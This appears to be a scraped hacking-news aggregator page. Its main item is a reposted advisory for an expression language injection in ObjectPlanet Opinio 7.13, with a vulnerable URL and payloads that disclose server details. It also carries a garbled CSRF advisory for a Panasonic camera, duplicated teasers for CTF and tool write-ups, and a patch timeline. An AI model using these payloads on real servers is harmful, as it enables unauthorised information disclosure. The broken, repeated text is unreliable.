Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
ObjectPlanet Opinio 7.13 Expression Language Injection
https://3.bp.blogspot.com/-8aNXwMYQICE/WWlvIs7ranI/AAAAAAAAILw/f2UnTjqyD14e3ZIoWuyFJjQ7Is9Nz7MtQCLcBGAs/s1600/h144.png
ObjectPlanet Opinio version 7.13 suffers from an expression language injection vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
ObjectPlanet Opinio 7.13 Expression Language Injection
https://3.bp.blogspot.com/-8aNXwMYQICE/WWlvIs7ranI/AAAAAAAAILw/f2UnTjqyD14e3ZIoWuyFJjQ7Is9Nz7MtQCLcBGAs/s1600/h144.png
ObjectPlanet Opinio version 7.13 suffers from an expression language injection vulnerability.
MD5 |
e4ac02c7c40ce27bf82fc181349ac136Download
# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng
# CVE: CVE-2020-26565
# Exploit Title: ObjectPlanet Opinio version 7.13 allows expression language injection
# Vendor Homepage: https://www.objectplanet.com/opinio/
# Software Link: https://www.objectplanet.com/opinio/
# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng
# CVE: CVE-2020-26565
# Timeline
- September 2020: Initial discovery
- October 2020: Reported to ObjectPlanet
- November 2020: Fix/patch provided by ObjectPlanet
- July 2021: CVE-2020-26565
# 1. Introduction
Opinio is a survey management solution by ObjectPlanet that allows surveys to be designed, published and managed.
# 2. Vulnerability Details
ObjectPlanet Opinio before version 7.13 is vulnerable to expression language injection
# 3. Proof of Concept
### Expression Language Injection leading to sensitive information disclosure ###
Step 1:
URL: /opinio/admin/permissionList.do?userId=1&from=$%7b7%2a7%7d
Payload: ${7*7} - URL encoded
The "from" parameter is vulnerable to Expression Language injection and this was validated by inspecting the loaded page source which executed the URL encoded payload to return 49
This vulnerability can be used to enumerate the sensitive information about the web server. Some examples of payloads that executed successfully are:
- ${pageContext.request.serverName} - returned server name
- ${pageContext.serveletContext.serverInfo} - returned server information
- ${pageContext.servletConfig.class} - returned information about the Apache server
This vulnerability was confirmed by ObjectPlanet Opinio in their patch notes which can be found at : https://www.objectplanet.com/opinio/changelog.html
-------------------------------------------------------
# 4. Remediation
Apply the latest fix/patch from objectplanet.
# 5. Credits
Timothy Tan (https://sg.linkedin.com/in/timtjh)
Khor Yong Heng (https://www.linkedin.com/in/khor-yong-heng-66108a120/)
Yu EnHui (https://www.linkedin.com/in/enhui-yu-88691b15b/)
Daniel Tan (https://www.linkedin.com/in/dantanjk/)
Source:packetstormsecurity.com
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Panasonic Sanyo CCTV Network Camera 2.03-0x Cross Site Request Forgery
https://3.bp.blogspot.com/-w74A7gxi0bY/WWlvD06cX8I/AAAAAAAAIK4/fcu0jWNFLhIrvrv6B2He7QdGvtDQ7X4rQCLcBGAs/s1600/h131.png
Panasonic Sanyo CCTV Network Camera version 2.03-0x allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. These actions can be exploited to perform authentication detriment and account password change with administrative privileges if a logged-in user visits a malicious web site.
MD5 |
Download
Source:packetstormsecurity.com
Panasonic Sanyo CCTV Network Camera 2.03-0x Cross Site Request Forgery
https://3.bp.blogspot.com/-w74A7gxi0bY/WWlvD06cX8I/AAAAAAAAIK4/fcu0jWNFLhIrvrv6B2He7QdGvtDQ7X4rQCLcBGAs/s1600/h131.png
Panasonic Sanyo CCTV Network Camera version 2.03-0x allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. These actions can be exploited to perform authentication detriment and account password change with administrative privileges if a logged-in user visits a malicious web site.
MD5 |
144372220bfafa4d89dbf4f8e47b37dfDownload
[CSRF]
[Anonymous user log in = ON]
orororororororororororororor
[Change admin password]
Source:packetstormsecurity.com
From Hobby to Hacking
Hello,my name is Muhammad Syahrul Haniawan. I am from Indonesia and this is my first write up on Medium.com. I’ll tell you a little about…Continue reading on Medium »
Read more...
Hello,my name is Muhammad Syahrul Haniawan. I am from Indonesia and this is my first write up on Medium.com. I’ll tell you a little about…Continue reading on Medium »
Read more...
Happy Hacker Summer Camp Season!
By Joy Buolamwini, Camille François, & Sasha Costanza-ChockContinue reading on Medium »
Read more...
By Joy Buolamwini, Camille François, & Sasha Costanza-ChockContinue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
Dorothy : Tool To Test Security Monitoring And Detection For Okta Environments
Dorothy is a tool to help security teams test their monitoring and detection capabilities for their Okta environment. Dorothy has several modules to simulate actions that an attacker might take while operating in an Okta environment and actions that security teams should be able to audit. The modules are mapped to the relevant MITRE ATT&CK® tactics, such […]
The post Dorothy : Tool To Test Security Monitoring And Detection For Okta Environments appeared first on Kali Linux Tutorials.
Dorothy : Tool To Test Security Monitoring And Detection For Okta Environments
Dorothy is a tool to help security teams test their monitoring and detection capabilities for their Okta environment. Dorothy has several modules to simulate actions that an attacker might take while operating in an Okta environment and actions that security teams should be able to audit. The modules are mapped to the relevant MITRE ATT&CK® tactics, such […]
The post Dorothy : Tool To Test Security Monitoring And Detection For Okta Environments appeared first on Kali Linux Tutorials.
Happy Hacker Summer Camp Season!
https://medium.com/@ajlunited/happy-hacker-summer-camp-season-e1f6fdaf7694?source=rss------bug_bounty-5
https://medium.com/@ajlunited/happy-hacker-summer-camp-season-e1f6fdaf7694?source=rss------bug_bounty-5
By Joy Buolamwini, Camille François, & Sasha Costanza-ChockContinue reading on Medium » (https://medium.com/@ajlunited/happy-hacker-summer-camp-season-e1f6fdaf7694?source=rss------bug_bounty-5)
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Cooctus Stories— TryHackme Makine Çözümü #CTF
https://cdn-images-1.medium.com/max/1498/1*CFogPxxAWaNFNNTStn1BNw.png
1)Açık Port ve Servislerin Keşfi
Continue reading on Medium »
Cooctus Stories— TryHackme Makine Çözümü #CTF
https://cdn-images-1.medium.com/max/1498/1*CFogPxxAWaNFNNTStn1BNw.png
1)Açık Port ve Servislerin Keşfi
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Lightweight web recon tool — R3con1z3r
https://cdn-images-1.medium.com/max/800/1*R_dgW3FAM-mJ8vtol8DjtA.jpeg
R3con1z3r is a lightweight Web information gathering device with instinctive highlights written in python. It gives a fantastic…
Continue reading on Purple TEAM »
Lightweight web recon tool — R3con1z3r
https://cdn-images-1.medium.com/max/800/1*R_dgW3FAM-mJ8vtol8DjtA.jpeg
R3con1z3r is a lightweight Web information gathering device with instinctive highlights written in python. It gives a fantastic…
Continue reading on Purple TEAM »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
“Defend the Web” write-up (Intro 4— path traversal vulnerability)
https://cdn-images-1.medium.com/max/1200/1*YMHFjl8B3-8QESreiq9KCQ.png
The goal of a path traversal attack (commonly referred to as directory traversal) is to get access to files and directories stored outside…
Continue reading on Purple TEAM »
“Defend the Web” write-up (Intro 4— path traversal vulnerability)
https://cdn-images-1.medium.com/max/1200/1*YMHFjl8B3-8QESreiq9KCQ.png
The goal of a path traversal attack (commonly referred to as directory traversal) is to get access to files and directories stored outside…
Continue reading on Purple TEAM »